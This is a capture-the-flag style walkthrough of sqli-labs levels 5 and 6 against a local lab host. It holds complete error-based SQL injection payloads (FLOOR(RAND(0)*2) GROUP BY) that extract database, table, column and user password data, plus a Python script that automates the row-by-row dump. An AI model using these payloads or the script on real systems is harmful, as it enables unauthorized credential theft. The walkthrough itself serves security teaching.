Less-5
1. First, determine how the parameter is closed and how many columns the query returns:
http://192.168.228.129/sqli-labs-master/Less-5/?id=1' --+
The parameter is closed with a single quote (the `--+` decodes to `-- ` and comments out the rest of the query), and the query returns 3 columns;
2. Look for display positions
http://192.168.228.129/sqli-labs-master/Less-5/?id=1' union select 1,1,1 --+
The statement executes (the page still renders normally), but none of the result columns is echoed, so the values injected through the UNION never show up. This is where Less-5 differs from the first four levels: without a display position, UNION-based extraction gets us nothing. From level 5 onward we therefore switch to another approach, error-based injection, which carries the data out inside the text of the MySQL error that the page echoes;
Background on error-based injection: link
3. Use the error payload to dump the database, tables, columns and values
http://192.168.228.129/sqli-labs-master/Less-5/?id=1' AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(DATABASE() AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+
This is the classic FLOOR(RAND(0)*2) GROUP BY trick. RAND(0) is seeded, so FLOOR(RAND(0)*2) always produces the sequence 0,1,1,0,1,1,...; GROUP BY evaluates the key once to look it up in its temporary table and again when it inserts a new group, so on the third row it tries to insert key 1 a second time and MySQL aborts with "Duplicate entry 'security~1' for key 'group_key'" (MySQL 8 prints '<group_key>'). Whatever we CONCAT into the key, here DATABASE() followed by 0x7e ('~') as a separator, is leaked in that error text; the outer FROM INFORMATION_SCHEMA.TABLES only serves to supply the three or more rows the collision needs. From the echoed error the database name is security; next, the same payload with TABLE_NAME gives the table names:
http://192.168.228.129/sqli-labs-master/Less-5/?id=1' AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(TABLE_NAME AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='SECURITY' LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+
Note the uppercase 'SECURITY': on a server whose file system and lower_case_table_names setting make database names case-sensitive (the Linux default), INFORMATION_SCHEMA comparisons on schema and table names follow that case-sensitivity and this WHERE would match nothing. If no error comes back, write the name in its real case, security.
That yields the first table; vary the LIMIT offset (LIMIT 1,1, LIMIT 2,1, ...) to walk through all of them in turn:
Having found the users table, point the same payload at INFORMATION_SCHEMA.COLUMNS to get its columns:
http://192.168.228.129/sqli-labs-master/Less-5/?id=1' AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(COLUMN_NAME AS CHAR),0x7e)) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='SECURITY' AND TABLE_NAME='USERS' LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+
(On a case-sensitive server, write security and users in their actual case.) Step through the LIMIT offsets again, or use GROUP_CONCAT(COLUMN_NAME) to get them all at once, bearing in mind that MySQL truncates the value in the Duplicate entry message to 64 characters, so a long GROUP_CONCAT result is cut off. The columns are id, username and password. Now dump the data:
http://192.168.228.129/sqli-labs-master/Less-5/?id=1' AND(SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(USERNAME) AS CHAR),0x7e)) FROM security.users LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+
Swap USERNAME for password to get the password, then step through the LIMIT offsets to read every row of the users table;
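Walking the database, the tables, the columns and finally the rows one LIMIT offset at a time is tedious by hand, so here is the loop as a script. This is an added example, not code from the write-up or from sqli-labs: it reproduces the payload shape of the URLs above, parameterised on the closing quote and the LIMIT offset, parses the leaked value out of MySQL's "Duplicate entry" message, and stops when the subquery runs out of rows. The FakeLab class and its table list are constructed here so the code runs offline; against the real lab, replace `lab.fetch` with a function that sends the GET request (for example with urllib or requests) and returns the response body. The base URL is the one from the write-up, and the `?id=1` parameter shape is assumed from it.

```python
"""Automate the FLOOR(RAND(0)*2) error-based extraction used in Less-5.

Added example, not part of the original write-up. The FakeLab responder
and its table list are constructed so the script runs offline.
"""
import re
from typing import Callable, List, Optional
from urllib.parse import quote

# Same payload shape as the write-up's URLs, parameterised on the closing
# quote (Less-5: "'"), the leaked expression, its source and the LIMIT offset.
# The 0x7e ('~') separator lets us split the leaked value from the FLOOR bit.
PAYLOAD_TEMPLATE = (
    "{closer} AND(SELECT 1 FROM (SELECT COUNT(*),"
    "CONCAT((SELECT(SELECT CONCAT(CAST({expr} AS CHAR),0x7e)) "
    "FROM {source} LIMIT {offset},1),FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) --+"
)

# MySQL 5.x names the key 'group_key', MySQL 8 names it '<group_key>'.
DUPLICATE_RE = re.compile(r"Duplicate entry '(.*?)~1' for key '<?group_key>?'")

# Characters left unencoded so the URL reads like the ones in the write-up.
# The trailing '+' of '--+' must survive: it decodes to the space that
# MySQL's '-- ' comment requires.
URL_SAFE = "'\"()*,=~+"


def build_payload(expr: str, source: str, offset: int, closer: str = "'") -> str:
    """Injected suffix that leaks row <offset> of `SELECT expr FROM source`."""
    return PAYLOAD_TEMPLATE.format(closer=closer, expr=expr, source=source, offset=offset)


def build_url(base: str, payload: str, benign_id: str = "1") -> str:
    """Assumed lab URL shape: <base>?id=<benign_id><payload>."""
    return f"{base}?id={benign_id}{quote(payload, safe=URL_SAFE)}"


def extract_leaked_value(body: str) -> Optional[str]:
    """Return the value between the quote and '~1' in the error, or None if
    the page came back without a Duplicate entry error."""
    match = DUPLICATE_RE.search(body)
    return match.group(1) if match else None


def dump_column(fetch: Callable[[str], str], expr: str, source: str,
                closer: str = "'", max_rows: int = 100) -> List[str]:
    """Walk LIMIT 0,1 / LIMIT 1,1 / ... until an offset past the last row.

    Past the end the inner subquery is NULL, CONCAT(NULL, ...) is NULL, every
    GROUP BY key is NULL, no duplicate occurs and the page renders normally;
    that missing error ends the loop.
    """
    values: List[str] = []
    for offset in range(max_rows):
        value = extract_leaked_value(fetch(build_payload(expr, source, offset, closer)))
        if value is None:
            break
        values.append(value)
    return values


class FakeLab:
    """Constructed stand-in for the Less-5 page: answers a payload the way the
    lab would if the queried source held `rows`, so the loop runs offline."""

    def __init__(self, rows: List[str], key_name: str = "group_key") -> None:
        self.rows = rows
        self.key_name = key_name

    def fetch(self, payload: str) -> str:
        offset = int(re.search(r"LIMIT (\d+),1", payload).group(1))
        if offset >= len(self.rows):
            return "<div>You are in...........</div>"
        return (f"<div>Duplicate entry '{self.rows[offset]}~1' "
                f"for key '{self.key_name}'</div>")


if __name__ == "__main__":
    # Constructed table list standing in for what the real error text returns.
    lab = FakeLab(["emails", "referers", "uagents", "users"])
    source = "INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='security'"
    print(dump_column(lab.fetch, "TABLE_NAME", source))
    print(build_url("http://192.168.228.129/sqli-labs-master/Less-5/",
                    build_payload("TABLE_NAME", source, 0)))
```

Three things to keep in mind when running this for real: the technique only works because the page echoes mysql_error(); the outer FROM needs a source with at least three rows (INFORMATION_SCHEMA.TABLES always qualifies); and MySQL 5.x cuts the value inside the Duplicate entry message at 64 characters, so a GROUP_CONCAT shortcut can lose data that the per-row loop above does not.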
Less-6
Less-6 is like Less-5: the data comes out through the same error-based injection, and only the closing character differs (a double quote instead of a single quote), so the payloads above work once the leading ' is replaced with ";